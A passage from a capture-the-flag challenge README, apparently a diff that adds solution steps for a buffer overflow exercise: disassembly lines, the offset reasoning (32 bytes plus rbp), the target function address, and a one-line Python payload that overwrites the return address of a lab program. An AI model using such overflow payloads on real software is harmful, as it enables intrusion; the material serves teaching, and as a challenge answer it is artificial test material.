SPGryphons/GryphonCTF2018-Lite-Challenges/challenges/reverse/Awesomeness/README.md

 `400664:	c9                   	leaveq`
 `400665:	c3                   	retq`
 Where the third line tells us 32 bytes is reserved for a variable.
 3. Derive that one needs to override 32 bytes + rbp to overwrite return address.
+4. Also derive address of `awesome` function is `400666`.
+Final command to assuming machine uses little-endian:
+`python -c 'print "a" * 40 + "\x66\x06\x40"' | ./awesomeProg`

 ## Recommended Reads
 * https://dhavalkapil.com/blogs/Buffer-Overflow-Exploit/